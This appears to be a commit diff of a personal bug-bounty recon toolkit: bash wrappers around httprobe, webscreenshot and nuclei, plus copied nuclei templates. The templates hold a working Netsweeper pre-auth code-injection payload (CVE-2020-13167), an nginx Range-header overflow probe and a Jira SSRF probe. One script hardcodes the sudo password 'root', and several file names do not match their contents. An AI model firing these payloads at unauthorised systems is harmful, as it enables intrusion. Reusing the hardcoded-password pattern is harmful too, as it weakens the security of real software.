ncl

Author: medbsq

domainEnum/test.sh

@@ -0,0 +1,13 @@
+#!/bin/bash 
+
+enum  $1
+cat ./$1_domain/domain >./domains
+
+cat domaims |httprobe -prefer-https |tee -a ./hosts
+
+
+webscreenshot.sh -i  ./hosts -o shots 
+
+../ncl/test.sh /home/mohamed/mytools/domainEnumTools/nuclei-templates  hosts
+
+

enum/1

@@ -6,11 +6,12 @@ cd $1
 subdomainEnum $1
 
 
-cat domains |httprobe -prefer-https >>hosts
+cat domains |httprobe -prefer-https |tee -a hosts
 
 
 cat hosts |nuclei -t /home/mohamed/mytools/domainEnumTools/nuclei-templates/subdomain-takeover/detect-all-takeovers.yaml -o takeover
 
+/home/mohamed/git_workspace/scripts/ncl/test.sh /home/mohamed/mytools/domainEnumTools/nuclei-templates  hosts
 
 webscreenshot.sh -i hosts -o ./shots
 

enum/chime.com/hosts

@@ -0,0 +1,9 @@
+#!/bin/bash 
+password="root"
+function sd(){
+        echo "$password" |sudo -S $1   || echo -e " $1\e[33m failled \e[0m"
+ }
+
+
+
+sd "apdt update "

enum/chime.com/takeover

@@ -0,0 +1,79 @@
+#!/bin/bash 
+
+read -sp 'sudo password: ' password
+
+function sd(){
+	echo "$password" |sudo -S $1   || echo -e " $1\e[33m failled \e[0m"
+}
+
+sd "apt update  -y" 
+sd "apt upgrade -y" 
+
+#dependencies 
+#if [ $(python3 -V | cut -d"." -f2) -lt 6 ];then 
+#	sd "apt install python3 -y 
+#elif [ go]
+sd "apt install python3 -y " 
+sd "apt install golang -y "  
+sd "apt install awk -y "     
+sd "apt install git -y"      
+sd "apt install pip3 -y"     
+sd "apt install snapd"       
+
+
+################################################### tools ##################################################
+mkdir  -p  ~/mytools  && cd ~/mytools 
+#sublister
+git clone  https://github.com/aboul3la/Sublist3r.git
+pip3 install -r ./Sublist3r/requirements.txt
+
+
+#amass
+sd "snap install amass " 
+
+
+
+#dirsearch
+git clone https://github.com/maurosoria/dirsearch.git
+
+
+#web screenshod
+sd "pip3 install webscreenshot" 
+
+
+
+#tomnonom tools
+go get -u github.com/tomnomnom/meg
+go get -u github.com/tomnomnom/assetfinder
+go get -u github.com/tomnomnom/httprobe
+go get -u github.com/tomnomnom/gron
+
+################################################### scripts ##################################################
+
+git clone https://github.com/medbsq/scripts
+git clone https://github.com/medbsq/gf
+git clone https://github.com/maurosoria/dirsearch
+
+
+
+
+############################################ bashrc file ########################################
+#github token
+#tavis Token
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+

enum/enum.sh

@@ -0,0 +1,8 @@
+#!/bin/bash
+
+read -sp "sudo password :" password
+for script in $(find  ./ -type d) ;do 
+	scriptname=ls $script |grep -ie ".sh$"
+	name=$(echo $scriptname |cut -d"." -f1)
+	echo "$password" |sudo -S cp /script/$scriptname /usr/local/bin/$name
+done

enum/test

@@ -0,0 +1,25 @@
+#!/bin/bash
+ 
+function help(){
+echo "usage:"
+echo "this script need a urls and regex for specify the scope"
+echo -e "\t l \t fetch list of js file(require)"
+echo -e "\t u \t get all urls "
+echo -e "\t p \t get all paths"
+}
+
+function csv(){
+	mkdir -p cve 
+	for csv in $(ls $1/cves );do
+		nuclei -t  $1/cves/$csv -v -l $2 -o "cve/$csv.txt"
+	done
+	for csv in $(ls $1/workflows);do
+                nuclei -t  $1/workflows/$csv -v -l $2 -o "cve/$csv.txt"
+        done
+
+}
+
+csv $1 $2
+
+
+

env/work_env.sh

@@ -0,0 +1,23 @@
+#!/bin/bash
+ 
+function help(){
+echo "usage:"
+echo "this script need a urls and regex for specify the scope"
+echo -e "\t u \t get all urls "
+echo -e "\t p \t get all paths"
+}
+
+function ncl(){
+	mkdir -p  nuclei_$1 
+	for i in $(ls /home/mohamed/git_workspace/scripts/ncl/tmp) ;do 
+		template="/home/mohamed/git_workspace/scripts/ncl/tmp/$i"
+		output="./nuclei_$1/$i.txt"
+		echo  -ne "\e[33mtemplate :  $i"\\r
+		nuclei -t  $template   -silent  -l $1 -o $output
+	done
+}
+
+ncl $1
+
+
+

install.sh

@@ -0,0 +1,108 @@
+#!/bin/bash
+ 
+function help(){
+echo "usage:"
+echo "this script take list of template and test it on list of url  "
+echo -e "\t u \t update  templates"
+echo -e "\t s \t show templates "
+echo -e "\t l \t provide list of url (require) "
+echo -e "\t t \t use specific template tmp1,tmp2,tmp3,..."
+}
+
+function ncl(){
+	mkdir -p  nuclei_$1 
+	for i in $(ls /home/mohamed/git_workspace/scripts/ncl/tmp) ;do 
+		template="/home/mohamed/git_workspace/scripts/ncl/tmp/$i"
+		output="./nuclei_$1/$i.txt"
+		echo  -ne "\e[33mtemplate :  $i"\\r
+		nuclei -t  $template   -silent  -l $1 -o $output  -c $2
+	done
+	find ./$output -empty -delete
+}
+
+
+function update_tmp(){
+	cd /home/mohamed/mytools/domainEnumTools/nuclei-templates && git pull 
+	cd - 
+
+	for i in basic-detections cves security-misconfiguration files security-misconfiguration panels vulnerabilities tokens subdomain-takeover workflows ;do
+		cp /home/mohamed/mytools/domainEnumTools/nuclei-templates/$i/* /home/mohamed/git_workspace/scripts/ncl/tmp/
+	done
+
+}
+
+function list_tmp(){
+	ls  /home/mohamed/git_workspace/scripts/ncl/tmp 
+
+}
+
+function specific_tmp(){
+	templt=$(echo $2 |sed 's/,/ /g' )
+	mkdir -p ./nuclei_$1
+	for i in $templt ;do
+                template="/home/mohamed/git_workspace/scripts/ncl/tmp/$i"
+                output="./nuclei_$1/$i.txt"
+                echo  -ne "\e[33mtemplate :  $i"\\r
+                nuclei -t  $template   -silent  -l $1 -o $output -c $3
+        done
+	find ./$output -empty -delete
+
+}
+
+#ncl $1
+
+tm=""
+url=""
+occurence=10
+while getopts ":l:t:su" OPTION
+do
+        case $OPTION in
+                s)
+			list_tmp
+			exit
+                        ;;
+                t)
+                        tm="$OPTARG"
+                        ;;
+		c)
+                        occurence="$OPTARG"
+                        ;;
+                l)
+                        url="$OPTARG"
+                        ;;
+		u)
+                        #update_tmp
+			echo "update"
+			exit
+                        list_tmp;;
+                :)
+                        help
+                        exit 1
+                        ;;
+                \?)
+                        help
+                        exit 1
+                        ;;
+
+        esac
+done
+
+if [[ $tm == "" ]] && [[ $url == "" ]];then
+	help
+	exit
+elif [[ $tm == "" ]] && [[ $url != "" ]];then
+	ncl $url  $occurence
+	exit
+elif [[ $tm != "" ]] && [[ $url == "" ]];then
+	help
+        exit
+else
+	specific_tmp $url $tm $occurence
+
+	exit
+fi
+
+
+
+
+

ncl/test.sh

@@ -0,0 +1,41 @@
+id: CVE-2020-13167
+
+info:
+  name: Netsweeper WebAdmin unixlogin.php Python Code Injection
+  author: dwisiswant0
+  severity: critical
+
+  # This template exploits a Python code injection in the Netsweeper
+  # WebAdmin component's unixlogin.php script, for versions 6.4.4 and
+  # prior, to execute code as the root user.
+
+  # Authentication is bypassed by sending a random whitelisted Referer
+  # header in each request.
+
+  # Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs.
+  # Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has
+  # been confirmed exploitable.
+
+  # References:
+  # - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
+  # - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
+
+requests:
+  - method: GET
+    path:
+      # Payload on hex: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/nonexistent
+      - "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6e6f6e6578697374656e74%27.decode%28%27hex%27%29%29%23&timeout=5"
+      - "{{BaseURL}}/webadmin/nonexistent"
+    headers:
+      Referer: "http://{{Hostname}}/webadmin/admin/service_manager_data.php"
+      User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)"
+      Connection: "close"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "nonexistent"
+        part: body
+      - type: status
+        status:
+          - 200

ncl/test2.sh

@@ -0,0 +1,30 @@
+id: CVE-2017-7529
+info:
+  author: "Harsh Bothra"
+  name: "Nginx Remote Integer Overflow"
+  severity: medium
+
+# This template supports the detection part only.
+# Do not test any website without permission
+# https://gist.githubusercontent.com/BlackVirusScript/75fae10a037c376555b0ad3f3da1a966/raw/d1cc081053636711881ea45c84e0971d5babe103/CVE-2017-7529.py
+
+requests:
+  - raw:
+      - |
+          GET / HTTP/1.1
+          Host: {{Hostname}}
+          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+          Accept-Language: en-US,en;q=0.5
+          Range: bytes=-17208,-9223372036854758792
+          Accept-Encoding: gzip, deflate
+          Connection: close
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 206
+      - type: word
+        words:
+          - nginx
+        part: header

ncl/test3.sh

@@ -0,0 +1,16 @@
+id: CVE-2017-9506
+
+info:
+  name: Jira IconURIServlet SSRF
+  author: Ice3man
+  severity: high
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/plugins/servlet/oauth/users/icon-uri?consumerUri=https://ipinfo.io/json"
+    matchers:
+      - type: word
+        words:
+          - "ipinfo.io/missingauth"
+        part: body